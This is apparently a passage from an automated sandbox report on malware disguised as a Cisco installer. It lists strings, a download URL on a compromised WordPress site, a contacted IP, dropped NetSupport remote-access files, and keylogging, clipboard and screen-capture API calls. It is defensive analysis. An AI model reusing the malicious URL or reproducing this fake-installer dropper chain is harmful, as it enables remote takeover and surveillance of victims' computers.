                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://www.cisco.com0
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: client32.exe, 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250187547.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330790653.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                  Source: client32.exe, 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250187547.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330790653.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com
                                  Source: client32.exe, 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250187547.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330790653.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                  Source: client32.exe, 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250187547.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330790653.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                  Source: wget.exe, wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm
                                  Source: wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68845954829.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69137999948.0000000003495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drString found in binary or memory: http://www.symauth.com/cps0(
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drString found in binary or memory: http://www.symauth.com/rpa00
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                  Source: wget.exe, 00000002.00000002.68845954829.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-edit
                                  Source: wget.exe, 00000002.00000002.68846552333.00000000012F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe
                                  Source: wget.exe, 00000002.00000002.68846552333.00000000012F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeeDriv
                                  Source: powershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                  Source: powershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                  Source: powershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                  Source: is-4ES8I.tmp.6.drString found in binary or memory: https://curl.se/docs/alt-svc.html
                                  Source: is-4ES8I.tmp.6.drString found in binary or memory: https://curl.se/docs/hsts.html
                                  Source: is-4ES8I.tmp.6.drString found in binary or memory: https://curl.se/docs/http-cookies.html
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drString found in binary or memory: https://d.symcb.com/cps0%
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.drString found in binary or memory: https://d.symcb.com/rpa0
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                  Source: powershell.exe, 00000008.00000002.69141328382.00000000053A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
                                  Source: CiscoSetup.exe, 00000005.00000000.68859027882.0000000000A91000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                                  Source: powershell.exe, 00000008.00000002.69152714619.0000000006CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                  Source: wget.exe, wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com
                                  Source: wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68845954829.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69137999948.0000000003495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                                  Source: wget.exe, 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.68846720068.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com14
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                                  Source: powershell.exe, 00000008.00000002.69141328382.0000000005706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                                  Source: CiscoSetup.exe, 00000005.00000003.69255300451.0000000002BB3000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000003.69247138672.00000000029FC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cisco.com
                                  Source: CiscoSetup.exe, 00000005.00000003.69255300451.0000000002BC1000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000003.69247138672.0000000002A0A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cisco.com/support
                                  Source: CiscoSetup.exe, 00000005.00000003.69255300451.0000000002BC1000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000003.69247138672.0000000002A0A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cisco.com/update
                                  Source: is-IGGJL.tmp.6.dr, is-C05BP.tmp.6.dr, is-8FFCG.tmp.6.dr, is-4ES8I.tmp.6.dr, is-J44M9.tmp.6.drString found in binary or memory: https://www.digicert.com/CPS0
                                  Source: wget.exe, 00000002.00000003.68839544083.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.68839544083.0000000002E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                                  Source: CiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iminunet.com
                                  Source: CiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iminunet.comPara
                                  Source: is-K762I.tmp.6.dr, is-HNAJ2.tmp.6.drString found in binary or memory: https://www.immunet.com
                                  Source: CiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.immunet.com.
                                  Source: is-NL2AM.tmp.6.drString found in binary or memory: https://www.immunet.comA
                                  Source: CiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.immunet.comAby
                                  Source: is-K762I.tmp.6.drString found in binary or memory: https://www.immunet.comPour
                                  Source: CiscoSetup.tmp, 00000006.00000003.69235227466.0000000005720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.immunet.comVoor
                                  Source: CiscoSetup.exe, 00000005.00000003.68864558047.000000007E80B000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.exe, 00000005.00000003.68863864836.0000000003050000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000000.68867343710.0000000000BD1000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.innosetup.com/
                                  Source: is-C05BP.tmp.6.drString found in binary or memory: https://www.openssl.org/
                                  Source: CiscoSetup.exe, 00000005.00000003.68864558047.000000007E80B000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.exe, 00000005.00000003.68863864836.0000000003050000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000006.00000000.68867343710.0000000000BD1000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.remobjects.com/ps
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                                  Source: unknownHTTPS traffic detected: 54.37.62.77:443 -> 192.168.11.20:49755 version: TLS 1.2

                                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                                  barindex
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11088380 SetWindowsHookExA 00000002,Function_00087920,00000000,0000000011_2_11088380
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,11_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,11_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11032930 GetClipboardFormatNameA,SetClipboardData,11_2_11032930
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,12_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11032930 GetClipboardFormatNameA,SetClipboardData,12_2_11032930
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11031AC0 IsClipboardFormatAvailable,GetClipboardData,GlobalSize,GlobalLock,GlobalUnlock,11_2_11031AC0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11007720 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,CreateFontIndirectA,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,11_2_11007720
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11110810 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,11_2_11110810
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11110810 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,12_2_11110810
                                  Source: Yara matchFile source: 11.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4288, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7744, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4252, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, type: DROPPED
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-NL0T9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.cat (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-43RVH.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpFile created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva-6.cat (copy)Jump to dropped file

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,11_2_11112840
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11112840 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,12_2_11112840

                                  System Summary

                                  barindex
                                  Source: amsi32_3588.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                  Source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\client32.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeProcess Stats: CPU usage > 6%
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110A9240: DeviceIoControl,11_2_110A9240
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1115A340 FindWindowA,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,11_2_1115A340
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,12_2_1102CE2D
                                  Source: C:\Windows\SysWOW64\wget.exeCode function: 2_3_02DEF5BC2_3_02DEF5BC
                                  Source: C:\Windows\SysWOW64\wget.exeCode function: 2_3_02DEF5BC2_3_02DEF5BC
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1102923011_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1107246011_2_11072460
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1115B18011_2_1115B180
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1105B3B011_2_1105B3B0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1106F21011_2_1106F210
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1107F52011_2_1107F520
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1101B98011_2_1101B980
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1115F9F011_2_1115F9F0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11079AD011_2_11079AD0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1101BDC011_2_1101BDC0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11163C5511_2_11163C55
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1108A26011_2_1108A260
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1105043011_2_11050430
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1108A96711_2_1108A967
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110088DB11_2_110088DB
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1101CBE011_2_1101CBE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11032A6011_2_11032A60
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11086DA011_2_11086DA0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11044C6011_2_11044C60
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_689BA98011_2_689BA980
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_689E491011_2_689E4910
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_689E392311_2_689E3923
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_689BDBA011_2_689BDBA0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1115B18012_2_1115B180
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1105B3B012_2_1105B3B0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1106F21012_2_1106F210
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1102923012_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1107F52012_2_1107F520
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1101B98012_2_1101B980
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1115F9F012_2_1115F9F0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11079AD012_2_11079AD0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1101BDC012_2_1101BDC0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11163C5512_2_11163C55
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1108A26012_2_1108A260
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1105043012_2_11050430
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1107246012_2_11072460
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1108A96712_2_1108A967
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110088DB12_2_110088DB
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1101CBE012_2_1101CBE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11032A6012_2_11032A60
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11086DA012_2_11086DA0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11044C6012_2_11044C60
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C2091912_2_68C20919
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C8091512_2_68C80915
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C3EB1A12_2_68C3EB1A
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C14B3012_2_68C14B30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C66E1812_2_68C66E18
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C06E2412_2_68C06E24
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C06E2812_2_68C06E28
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C0A1DD12_2_68C0A1DD
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68BF21F012_2_68BF21F0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C6415912_2_68C64159
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C622CD12_2_68C622CD
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C0828B12_2_68C0828B
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4A27712_2_68C4A277
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C0820B12_2_68C0820B
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C8822012_2_68C88220
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C0839B12_2_68C0839B
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C0C46C12_2_68C0C46C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C145AE12_2_68C145AE
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C967FF12_2_68C967FF
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C6E7F112_2_68C6E7F1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C6F8BA12_2_68C6F8BA
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C6987712_2_68C69877
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C8396812_2_68C83968
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C91AE012_2_68C91AE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4DA3812_2_68C4DA38
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C03B1D12_2_68C03B1D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C97B2A12_2_68C97B2A
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C81CEF12_2_68C81CEF
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C09C8E12_2_68C09C8E
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C09C4812_2_68C09C48
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C03DB112_2_68C03DB1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C07D2012_2_68C07D20
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C05E2012_2_68C05E20
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4DF3512_2_68C4DF35
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C631BA12_2_68C631BA
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C6516D12_2_68C6516D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C1911E12_2_68C1911E
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C9929512_2_68C99295
